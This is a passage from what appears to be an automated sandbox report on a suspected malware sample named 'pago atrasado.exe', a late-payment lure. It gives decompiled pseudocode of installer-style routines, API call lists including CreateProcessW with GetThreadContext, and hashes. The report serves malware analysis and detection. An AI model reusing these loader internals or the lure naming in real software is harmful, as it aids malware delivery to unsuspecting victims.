                                            									}
                                            									goto L45;
                                            								}
                                            								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
                                            								if(_t78 == 0 || _v20 != _t101) {
                                            									goto L29;
                                            								} else {
                                            									_v8 = _v8 + _t101;
                                            									goto L24;
                                            								}
                                            							}
                                            						}
                                            						_push(0xfffffffc);
                                            						goto L35;
                                            					}
                                            					goto L34;
                                            				}
                                            			}

























                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402EEC
                                            • GetTickCount.KERNEL32 ref: 00402F6D
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                            • wsprintfA.USER32 ref: 00402FAA
                                            • WriteFile.KERNEL32(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 4209647438-2449383134
                                            • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                            • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                            • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                            • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405346(CHAR* _a4) {
                                            				struct _SECURITY_ATTRIBUTES _v16;
                                            				struct _SECURITY_DESCRIPTOR _v36;
                                            				int _t22;
                                            				long _t23;
                                            
                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                            				_v36.Owner = 0x40735c;
                                            				_v36.Group = 0x40735c;
                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                            				_v16.lpSecurityDescriptor =  &_v36;
                                            				_v36.Revision = 1;
                                            				_v36.Control = 4;
                                            				_v36.Dacl = 0x40734c;
                                            				_v16.nLength = 0xc;
                                            				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                            				if(_t22 != 0) {
                                            					L1:
                                            					return 0;
                                            				}
                                            				_t23 = GetLastError();
                                            				if(_t23 == 0xb7) {
                                            					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                            						goto L1;
                                            					}
                                            					return GetLastError();
                                            				}
                                            				return _t23;
                                            			}








                                            APIs
                                            • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                            • GetLastError.KERNEL32 ref: 0040539D
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                            • GetLastError.KERNEL32 ref: 004053BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop$Ls@$\s@
                                            • API String ID: 3449924974-776639217
                                            • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                            • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessW.KERNEL32(?,00000000), ref: 1001B138
                                            • GetThreadContext.KERNEL32(?,00010007), ref: 1001B15B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ContextCreateProcessThread
                                            • String ID: D
                                            • API String ID: 2843130473-2746444292
                                            • Opcode ID: a1ee6b9165808dd86ecb6f52cc606ca6c21a90c47e25f96645d1c742f475e900
                                            • Instruction ID: 539a89a145bdbe1c91b6f9da7f541eb28d86d7eb560c16d0b10e8d65c56b68ef
                                            • Opcode Fuzzy Hash: a1ee6b9165808dd86ecb6f52cc606ca6c21a90c47e25f96645d1c742f475e900
                                            • Instruction Fuzzy Hash: C9A1E274E00209AFDB51DFA4C981BAEBBF5EF08344F204465E915EB291E730EA81DF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405EBA(intOrPtr _a4) {
                                            				char _v292;
                                            				int _t10;
                                            				struct HINSTANCE__* _t14;
                                            				void* _t16;
                                            				void* _t21;
                                            
                                            				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                            				if(_t10 > 0x104) {
                                            					_t10 = 0;
                                            				}
                                            				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                            					_t16 = 1;
                                            				} else {
                                            					_t16 = 0;
                                            				}
                                            				_t5 = _t16 + 0x409010; // 0x5c
                                            				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                            				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                            				return _t14;
                                            			}









                                            APIs
                                            • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                            • wsprintfA.USER32 ref: 00405F0A
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                            • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
                                            				signed int _t11;
                                            				int _t14;
                                            				signed int _t16;
                                            				void* _t19;
                                            				CHAR* _t20;
                                            
                                            				_t20 = _a4;
                                            				_t19 = 0x64;
                                            				while(1) {
                                            					_t19 = _t19 - 1;
                                            					_a4 = 0x61736e;
                                            					_t11 = GetTickCount();
                                            					_t16 = 0x1a;
                                            					_a6 = _a6 + _t11 % _t16;
                                            					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                            					if(_t14 != 0) {
                                            						break;
                                            					}
                                            					if(_t19 != 0) {
                                            						continue;
                                            					}
                                            					 *_t20 =  *_t20 & 0x00000000;
                                            					return _t14;
                                            				}
                                            				return _t20;
                                            			}









                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004058B1
                                            • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2428704544
                                            • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                            • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A96D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 6a76c7b9f7d3c9d3a6ec9dd3f7f98038fd81c041856c0fbbeada39e8650c3018
                                            • Instruction ID: 42b92da4ee14fc9a13e057689146698bdecd4bc0cd7aa704d178068b0762236e
                                            • Opcode Fuzzy Hash: 6a76c7b9f7d3c9d3a6ec9dd3f7f98038fd81c041856c0fbbeada39e8650c3018
                                            • Instruction Fuzzy Hash: D4614935E44248ABDB50CBE4EC56BEDB7B5EF48710F20801AE608EE2E0E7705E81DB05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E00401F84(void* __ebx, void* __eflags) {
                                            				struct HINSTANCE__* _t18;
                                            				struct HINSTANCE__* _t26;
                                            				void* _t27;
                                            				struct HINSTANCE__* _t30;
                                            				CHAR* _t32;
                                            				intOrPtr* _t33;
                                            				void* _t34;
                                            
                                            				_t27 = __ebx;
                                            				asm("sbb eax, 0x423ff8");
                                            				 *(_t34 - 4) = 1;
                                            				if(__eflags < 0) {
                                            					_push(0xffffffe7);
                                            					L15:
                                            					E00401423();
                                            					L16:
                                            					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
                                            					return 0;
                                            				}
                                            				_t32 = E00402A29(0xfffffff0);
                                            				 *(_t34 + 8) = E00402A29(1);
                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                            					L3:
                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                            					_t30 = _t18;
                                            					if(_t30 == _t27) {
                                            						_push(0xfffffff6);
                                            						goto L15;
                                            					}
                                            					L4:
                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                            					if(_t33 == _t27) {
                                            						E00404E84(0xfffffff7,  *(_t34 + 8));
                                            					} else {
                                            						 *(_t34 - 4) = _t27;
                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
                                            						} else {
                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                            							if( *_t33() != 0) {
                                            								 *(_t34 - 4) = 1;
                                            							}
                                            						}
                                            					}
                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
                                            						FreeLibrary(_t30);
                                            					}
                                            					goto L16;
                                            				}
                                            				_t26 = GetModuleHandleA(_t32); // executed
                                            				_t30 = _t26;
                                            				if(_t30 != __ebx) {
                                            					goto L4;
                                            				}
                                            				goto L3;
                                            			}











                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                            • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                            • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                            • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E004015B3(char __ebx) {
                                            				void* _t13;
                                            				int _t19;
                                            				char _t21;
                                            				void* _t22;
                                            				char _t23;
                                            				signed char _t24;
                                            				char _t26;
                                            				CHAR* _t28;
                                            				char* _t32;
                                            				void* _t33;
                                            
                                            				_t26 = __ebx;
                                            				_t28 = E00402A29(0xfffffff0);
                                            				_t13 = E0040571F(_t28);
                                            				_t30 = _t13;
                                            				if(_t13 != __ebx) {
                                            					do {
                                            						_t32 = E004056B6(_t30, 0x5c);
                                            						_t21 =  *_t32;
                                            						 *_t32 = _t26;
                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                            						if(_t21 != _t26) {
                                            							L5:
                                            							_t22 = E004053C3(_t28);
                                            						} else {
                                            							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
                                            								goto L5;
                                            							} else {
                                            								_t22 = E00405346(_t28); // executed
                                            							}
                                            						}
                                            						if(_t22 != _t26) {
                                            							if(_t22 != 0xb7) {
                                            								L9:
                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                            							} else {
                                            								_t24 = GetFileAttributesA(_t28); // executed
                                            								if((_t24 & 0x00000010) == 0) {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                            						 *_t32 = _t23;
                                            						_t30 = _t32 + 1;
                                            					} while (_t23 != _t26);
                                            				}
                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                            					_push(0xfffffff5);
                                            					E00401423();
                                            				} else {
                                            					E00401423(0xffffffe6);
                                            					E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                            					if(_t19 == 0) {
                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                            					}
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
                                            				return 0;
                                            			}














                                            APIs
                                              • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                              • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                              • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                              • Part of subcall function 00405346: CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                            • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 1892508949-1943935188
                                            • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                            • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                            • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                            • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 99%
                                            			E00406609() {
                                            				signed int _t530;
                                            				void _t537;
                                            				signed int _t538;
                                            				signed int _t539;
                                            				unsigned short _t569;
                                            				signed int _t579;
                                            				signed int _t607;
                                            				void* _t627;
                                            				signed int _t628;
                                            				signed int _t635;
                                            				signed int* _t643;
                                            				void* _t644;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					_t530 =  *(_t644 - 0x30);
                                            					if(_t530 >= 4) {
                                            					}
                                            					 *(_t644 - 0x40) = 6;
                                            					 *(_t644 - 0x7c) = 0x19;
                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                            					while(1) {
                                            						L145:
                                            						 *(_t644 - 0x50) = 1;
                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                            						while(1) {
                                            							L149:
                                            							if( *(_t644 - 0x48) <= 0) {
                                            								goto L155;
                                            							}
                                            							L150:
                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                            							 *(_t644 - 0x54) = _t643;
                                            							_t569 =  *_t643;
                                            							_t635 = _t569 & 0x0000ffff;
                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                            							if( *(_t644 - 0xc) >= _t607) {
                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                            								_t628 = _t627 + 1;
                                            								 *_t643 = _t569 - (_t569 >> 5);
                                            								 *(_t644 - 0x50) = _t628;
                                            							} else {
                                            								 *(_t644 - 0x10) = _t607;
                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                            							}
                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                            								L148:
                                            								_t487 = _t644 - 0x48;
                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                            								L149:
                                            								if( *(_t644 - 0x48) <= 0) {
                                            									goto L155;
                                            								}
                                            								goto L150;
                                            							} else {
                                            								L154:
                                            								L146:
                                            								if( *(_t644 - 0x6c) == 0) {
                                            									L169:
                                            									 *(_t644 - 0x88) = 0x18;
                                            									L170:
                                            									_t579 = 0x22;
                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                            									_t539 = 0;
                                            									L172:
                                            									return _t539;
                                            								}
                                            								L147:
                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            								_t484 = _t644 - 0x70;
                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            								goto L148;
                                            							}
                                            							L155:
                                            							_t537 =  *(_t644 - 0x7c);
                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                            							while(1) {
                                            								L140:
                                            								 *(_t644 - 0x88) = _t537;
                                            								while(1) {
                                            									L1:
                                            									_t538 =  *(_t644 - 0x88);
                                            									if(_t538 > 0x1c) {
                                            										break;
                                            									}
                                            									L2:
                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
                                            										case 0:
                                            											L3:
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											L4:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											_t538 =  *( *(_t644 - 0x70));
                                            											if(_t538 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											L5:
                                            											_t542 = _t538 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t581);
                                            											_push(9);
                                            											_pop(_t582);
                                            											_t638 = _t542 / _t581;
                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                            											asm("cdq");
                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                            											 *(_t644 - 0x3c) = _t633;
                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                            												L10:
                                            												if(_t641 == 0) {
                                            													L12:
                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t641 = _t641 - 1;
                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                            												} while (_t641 != 0);
                                            												goto L12;
                                            											}
                                            											L6:
                                            											if( *(_t644 - 4) != 0) {
                                            												GlobalFree( *(_t644 - 4));
                                            											}
                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t644 - 4) = _t538;
                                            											if(_t538 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t644 - 0x6c);
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L157:
                                            												 *(_t644 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											L14:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											_t45 = _t644 - 0x48;
                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t644 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											L16:
                                            											_t550 =  *(_t644 - 0x40);
                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                            												L20:
                                            												 *(_t644 - 0x48) = 5;
                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											L17:
                                            											 *(_t644 - 0x74) = _t550;
                                            											if( *(_t644 - 8) != 0) {
                                            												GlobalFree( *(_t644 - 8)); // executed
                                            											}
                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                            											 *(_t644 - 8) = _t538;
                                            											if(_t538 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                            											 *(_t644 - 0x84) = 6;
                                            											 *(_t644 - 0x4c) = _t557;
                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                            											goto L132;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t644 - 0x6c);
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L158:
                                            												 *(_t644 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											L22:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											_t67 = _t644 - 0x70;
                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                            											if( *(_t644 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t559 =  *_t642;
                                            											_t626 = _t559 & 0x0000ffff;
                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                            											if( *(_t644 - 0xc) >= _t596) {
                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                            												 *(_t644 - 0x40) = 1;
                                            												_t560 = _t559 - (_t559 >> 5);
                                            												__eflags = _t560;
                                            												 *_t642 = _t560;
                                            											} else {
                                            												 *(_t644 - 0x10) = _t596;
                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                            											}
                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											} else {
                                            												goto L137;
                                            											}
                                            										case 5:
                                            											L137:
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L168:
                                            												 *(_t644 - 0x88) = 5;
                                            												goto L170;
                                            											}
                                            											L138:
